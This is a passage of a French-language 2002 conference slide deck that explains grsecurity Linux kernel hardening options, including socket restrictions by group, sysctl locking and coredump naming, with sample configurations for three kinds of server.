d'accéder à des options de limitation des sockets Internet %%%font "code" %% If you say Y here, you will be able to choose from several options. %% If you assign a GID on your system and add it to the supplementary %% groups of users you want to restrict socket access to, this patch %% will perform up to three things, based on the option(s) you choose. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny any sockets to group %font "code" CONFIG_GRKERNSEC_SOCKET_ALL %font "standard" Interdit à un groupe donné d'ouvrir des sockets clientes et serveurs Nécessite "Socket restrictions" %cont, font "code" CONFIG_GRKERNSEC_SOCKET %font "standard" %%%font "code" %% If you say Y here, you will be able to choose a GID of whose users will %% be unable to connect to other hosts from your machine or run server %% applications from your machine. If the sysctl option is enabled, a %% sysctl option with name "socket_all" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page GID to deny all sockets for %font "code" CONFIG_GRKERNSEC_SOCKET_ALL_GID 1004 %font "standard" Spécifie le groupe interdit d'ouvrir des sockets clientes et serveurs Nécessite "Deny any sockets to group" %cont, font "code" CONFIG_GRKERNSEC_SOCKET_ALL %font "standard" %%%font "code" %% Here you can choose the GID to disable socket access for. Remember to %% add the users you want socket access disabled for to the GID %% specified here. If the sysctl option is enabled, whatever you choose %% here won't matter. You'll have to specify the GID in your bootup %% script by echoing the GID to the proper /proc entry. View the help %% on the sysctl option for more information. If the sysctl option is %% enabled, a sysctl option with name "socket_all_gid" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny client sockets to group %font "code" CONFIG_GRKERNSEC_SOCKET_CLIENT %font "standard" Interdit à un groupe donné d'ouvrir des sockets clientes Nécessite "Socket restrictions" %cont, font "code" CONFIG_GRKERNSEC_SOCKET %font "standard" %%%font "code" %% If you say Y here, you will be able to choose a GID of whose users will %% be unable to connect to other hosts from your machine, but will be %% able to run servers. If this option is enabled, all users in the group %% you specify will have to use passive mode when initiating ftp transfers %% from the shell on your machine. If the sysctl option is enabled, a %% sysctl option with name "socket_client" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page GID to deny client sockets for %font "code" CONFIG_GRKERNSEC_SOCKET_CLIENT_GID 1003 %font "standard" Spécifie le groupe interdit d'ouvrir des sockets clientes Nécessite "Deny client sockets to group" %cont, font "code" CONFIG_GRKERNSEC_SOCKET_CLIENT %font "standard" %%%font "code" %% Here you can choose the GID to disable client socket access for. %% Remember to add the users you want client socket access disabled for to %% the GID specified here. If the sysctl option is enabled, whatever you %% choose here won't matter. You'll have to specify the GID in your bootup %% script by echoing the GID to the proper /proc entry. View the help %% on the sysctl option for more information. If the sysctl option is %% enabled, a sysctl option with name "socket_client_gid" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny server sockets to group %font "code" CONFIG_GRKERNSEC_SOCKET_SERVER %font "standard" Interdit à un groupe donné d'ouvrir des sockets serveurs Nécessite "Socket restrictions" %cont, font "code" CONFIG_GRKERNSEC_SOCKET %font "standard" %%%font "code" %% If you say Y here, you will be able to choose a GID of whose users will %% be unable to run server applications from your machine. If the sysctl %% option is enabled, a sysctl option with name "socket_server" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page GID to deny server sockets for %font "code" CONFIG_GRKERNSEC_SOCKET_SERVER_GID 1002 %font "standard" Spécifie le groupe interdit d'ouvrir des sockets serveurs Nécessite "Deny server sockets to group" %cont, font "code" CONFIG_GRKERNSEC_SOCKET_SERVER %font "standard" %%%font "code" %% Here you can choose the GID to disable server socket access for. %% Remember to add the users you want server socket access disabled for to %% the GID specified here. If the sysctl option is enabled, whatever you %% choose here won't matter. You'll have to specify the GID in your bootup %% script by echoing the GID to the proper /proc entry. View the help %% on the sysctl option for more information. If the sysctl option is %% enabled, a sysctl option with name "socket_server_gid" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Groupe d'options 7/8 %cont, fore "grey40" Buffer Overflow Protection %cont, fore "grey40" Access Control Lists %cont, fore "grey40" Filesystem Protections %cont, fore "grey40" Kernel Auditing %cont, fore "grey60" Executable Protections %cont, fore "grey80" Network Protections %cont, fore "green" Sysctl support Miscellaneous Enhancements %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Sysctl support %font "code" CONFIG_GRKERNSEC_SYSCTL %font "standard" Permet d'activer le support de la configuration dynamique des options grsecurity présentes Une arborescence /proc/sys/kernel/grsecurity est créée et un pseudo fichier par option est présent Si cette option est activée alors toutes les options sont désactivées par défaut Une entrée grsec_lock permet de rendre non modifiables toutes les entrées À modifier après configuration des autres entrées %%%font "code" %% If you say Y here, you will be able to change the options that %% grsecurity runs with at bootup, without having to recompile your %% kernel. You can echo values to files in /proc/sys/kernel/grsecurity %% to enable (1) or disable (0) various features. All the sysctl entries %% are mutable until the "grsec_lock" entry is set to a non-zero value. %% All features are disabled by default. Please note that this option could %% reduce the effectiveness of the added security of this patch if an ACL %% system is not put in place. Your init scripts should be read-only, and %% root should not have access to adding modules or performing raw i/o %% operations. All options should be set at startup, and the grsec_lock %% entry should be set to a non-zero value after all the options are set. %% *THIS IS EXTREMELY IMPORTANT* %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Groupe d'options 8/8 %cont, fore "grey40" Buffer Overflow Protection %cont, fore "grey40" Access Control Lists %cont, fore "grey40" Filesystem Protections %cont, fore "grey40" Kernel Auditing %cont, fore "grey40" Executable Protections %cont, fore "grey60" Network Protections %cont, fore "grey80" Sysctl support %cont, fore "green" Miscellaneous Enhancements %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page BSD-style coredumps %font "code" CONFIG_GRKERNSEC_COREDUMP %font "standard" Change le nom des fichiers coredump sous Linux tout fichier coredump s'appelle core sous *BSD tout fichier coredump s'appelle core.nomDuProcessus Avec cette option les fichiers coredump s'appelle core.nomDuProcessus Les fichiers core sont générés dans le répertoire courant de l'application Cette option peut permettre de récupérer les fichiers coredump de plusieurs applications différentes s'exécutant dans le même répertoire %%%font "code" %% If you say Y here, linux will use a style similar to BSD for %% coredumps, core.processname. Not a security feature, just %% a useful one. If the sysctl option is enabled, a sysctl option with %% name "coredump" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Quelques cas concrets Le serveur d'un particulier Le serveur de e-commerce Le serveur de la NSA %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le serveur d'un particulier + Buffer Overflow Protection - Access Control Lists + Filesystem Protections - Kernel Auditing - Executable Protections - Network Protections - Sysctl support - Miscellaneous Enhancements Buffer Overflow Protection : PaX est à choisir car la protection mmap est absente du portage du patch openwall En fait ici le patch openwall est recommendable car il comporte la protection contre la pile exécutable avec émulation des sauts par trampoline la protection mmap la protection des fichiers temporaires la protection des entrées/sorties %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le serveur de e-commerce + Buffer Overflow Protection - Access Control Lists + Filesystem Protections + Kernel Auditing limité à un groupe bien précis - Executable Protections + Trusted path execution - Network Protections + Socket restrictions (ou ceci est applicable) - Sysctl support + Miscellaneous Enhancements %cont, fore "red" Attention %cont, fore "white" : rien ne protège contre les scripts perl/asp écrits rapidement au fond d'un garage... ici les seules protections sont : la %cont, fore "green" conception sécurisée %cont, fore "grey75" dès le début du projet l' %cont, fore "green" audit de code %cont, fore "grey75" tout au long du projet %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le serveur de la NSA + Buffer Overflow Protection + Access Control Lists + Filesystem Protections + Kernel Auditing non limité à un groupe + Executable Protections + Network Protections Sauf Randomized IP IDs, TTL et Altered Ping IDs - Sysctl support + Miscellaneous Enhancements C'est une blague : la NSA préfère utiliser Windows car c'est plus mieux bien certifié... %cont, fore "green" ;-) %fore "white" disons que c'est un serveur avec des informations ultra sensibles "Sauf Randomized IP IDs, TTL et Altered Ping IDs" car il ne s'agit que de rendre plus difficile l'identification du système, ce qui est obtenable via bien d'autres moyens... "Sysctl support" : une fois les bonnes choisies elles n'ont pas à être modifiées %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Conclusion Il y a des choses utiles pour se protéger temporairement de failles non connues le temps de la mise à jour pour rendre plus complexe la tâche des pirates pour permettre la détection de comportements anormaux Suivant le niveau requis, le nombre d'options à activer varie certaines options ne peuvent être appliquées sur des systèmes trop complexes un individu seul ne peut pas gérer correctement toute la journalisation générée par l'audit Cela ne dispense pas de démons bien choisis et bien configurés le durcissement du système est un pré-requis obligatoire bastille linux peut être un bon début : http://www.bastille-linux.org/ sinon il sera possible de passer root localement et de contourner bien des protections de mises à jour aussi rapides que possible dès la connaissance de toute vulnérabilité %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Merci de votre attention %rcutin, size 7, pause Vous pouvez poser vos questions... %size 4 %rcutin, size 6 et faire connaître vos remarques... %size 4 %rcutin, right, size 5 même par messagerie électronique. %size 4 %rcutin, left, size 3, pause puis réveiller discrètement ceux qui dorment ;-) %size 4 %rcutin, center, size 5 Bye, bye... %size 4 %right (c) 01/2002 Denis Ducamp / HSC pour RÉSIST 2002